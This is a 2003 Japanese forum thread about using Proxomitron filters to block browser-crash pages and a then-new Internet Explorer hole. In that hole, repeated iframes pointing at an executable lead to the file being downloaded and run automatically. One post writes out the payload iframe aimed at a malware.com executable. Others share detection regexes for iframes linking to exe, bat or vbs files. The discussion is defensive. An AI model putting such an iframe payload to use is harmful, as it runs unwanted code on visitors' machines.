ブラクラにProxomitronで対抗するスレPart4

このエントリーをはてなブックマークに追加
603名無しさん@お腹いっぱい。
ttp://www.malware.com/forceframe.html
ちょっとだけ、bypassして試してみたくなった
604名無しさん@お腹いっぱい。:03/05/16 19:44 ID:N89sRQU2
>603
bypassしてみた、open()で開くのよりは破壊力がないね、とか
605名無しさん@お腹いっぱい。:03/05/16 21:20 ID:oAKQCrkX
綺麗に並んでるソースだな。
606名無しさん@お腹いっぱい。:03/05/16 21:47 ID:PI6WM6qN
「最初はファイルダウンロードのダイアログが大量に出てくるが、しばらくする
と、勝手に実行されてしまうようになる。手元のIE 6.0 SP1 でも再現できた。」

リソースいっぱい食べてくれて、ファイルもDLさせてもらいました。
どうもありがとぅ
607名無しさん@お腹いっぱい。:03/05/16 22:07 ID:N89sRQU2
>606

> と、勝手に実行されてしまうようになる。

これは釣り?
608名無しさん@お腹いっぱい。:03/05/17 01:21 ID:ZtVoyqzX
>>603ってどのフィルター入れてれば防げるの?toc入れてるんだけどくらっちゃった。
609名無しさん@お腹いっぱい。:03/05/17 02:13 ID:bILiMtZX
>>608
Kill Too Many Frames (2002/11/30)
610608:03/05/17 03:01 ID:ZtVoyqzX
>>609
あれ、おかしいな、入れてるんだけど。。。
611名無しさん@お腹いっぱい。:03/05/17 09:52 ID:OD5SFaiN
>>610
そのブラクラのソースをテストする場所にコピペしてみては?
612名無しさん@お腹いっぱい。:03/05/17 12:19 ID:YvDVy6Xj
Bypassした情報がキャッシュに残ってる状態で
保存しているページの新しいバージョンの確認
の確認しないにチェックがはいっているとか?
613名無しさん@お腹いっぱい。:03/05/17 15:51 ID:AACyqLaC
デバッグしろよ
614名無しさん@お腹いっぱい。:03/05/19 03:52 ID:n/8m6O+o
>>603-607
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20030517/1/
[2003/05/17]IEにセキュリティ・ホール,スクリプトを無効にしても攻撃を受ける

> 攻撃方法はとても容易である。例えば攻撃者は,悪意があるファイルを
> 指定したiframeタグを繰り返し記述したWebページを用意するだけでよい。
> IEユーザーがそのページを閲覧すると,指定されたファイルに対する処理を
> ユーザーに求めるダイアログが表示される(写真)。iframeタグが繰り返し
> 記述されているために,このダイアログは次々に表示される。ここまでは
> 仕様通りである。ところが,次々と表示されているうちに,ユーザーが
> 何の指定をしなくても“なぜか”指定されたファイルが勝手にダウンロードされて,
> 実行されてしまうのである。


これだ。IE怖いなぁ
615名無しさん@お腹いっぱい。:03/05/19 15:10 ID:FaDwPUAc
おいらはファイルのダウンロード無効にしたよ。
ダウンロードはDownload Expressとかふらげなんか使えばいいし。
修正プログラム出るまで辛抱しよう。
616名無しさん@お腹いっぱい。:03/05/19 15:55 ID:jmDCymPi
603のファイル勝手に実行されたかも。。。
あれは何するファイル?
617名無しさん@お腹いっぱい。:03/05/19 16:06 ID:3klx3UXU
>>603
Firebirdだとダイアログが一回出るだけだった。
618名無しさん@お腹いっぱい。:03/05/19 22:30 ID:ucYQhmdN
>>614
怖いねぇ。
ダウンロードとフィルタ[Kill Too Many Frames]を無効にして試してみた。
[Kill Too Many Frames]は重要だ。
619名無しさん@お腹いっぱい。:03/05/19 22:34 ID:ucYQhmdN
ところでfooware.exe拾った人、これどんなん?
>>603ではfooware.exeは実行はされないのかな?
620名無しさん@お腹いっぱい。:03/05/19 23:09 ID:w3WKwBX+
>>619
アンタも地獄の業火で焼かれてみんしゃぃ
621名無しさん@お腹いっぱい。:03/05/19 23:32 ID:qs9NcSPe
ローカルで鯖立てて試してみたところ、アル程度ダウンロードの確認画面が出揃ったところで次は署名の確認ダイアログが出始め、終いには実行されました。
とっくたんのおかげで普通は防げますが
622名無しさん@お腹いっぱい。:03/05/20 02:06 ID:471MDoTv
<iframe src="http://www.malware.com/fooware.exe">

んだなや
623名無しさん@お腹いっぱい。:03/05/20 03:44 ID:/Sku7cQK
DLのダイアログがでることすらウザイので簡単だけど作ってみた。
指摘があったらヨロ。

Name = "Kill Illigal IFRAME"
Active = TRUE
Multi = TRUE
Limit = 512
Match = "<iframe src=($AV(*.(exe|com|bat|cmd|vbs|wsf|wsh|reg)))\1[^>]++>"
Replace = "<small><a href=\1 style="color:red">[Illigal iFrame]</a></small>"
624名無しさん@お腹いっぱい。:03/05/20 03:48 ID:/Sku7cQK
自己レス
Match = "<iframe[^>]++src=($AV(*.(exe|com|bat|cmd|vbs|wsf|wsh|reg)))\1[^>]++>"
のほうがいいな。
やっぱまだフィルタ作るスキル無いなぁ・・・
625名無しさん@お腹いっぱい。:03/05/20 12:16 ID:Wa6rVtl1
626名無しさん@お腹いっぱい。:03/05/20 14:12 ID:fbzCy1Nt
>>623
Bounds = "<iframe\s*>"
Match = "*src=($AV(*.(exe|com|bat|cmd|vbs|wsf|wsh|reg)))\1*"
627名無しさん@お腹いっぱい。:03/05/20 14:46 ID:mDf31wg4
Proxomitron-Jにも対策フィルタ上がってるね。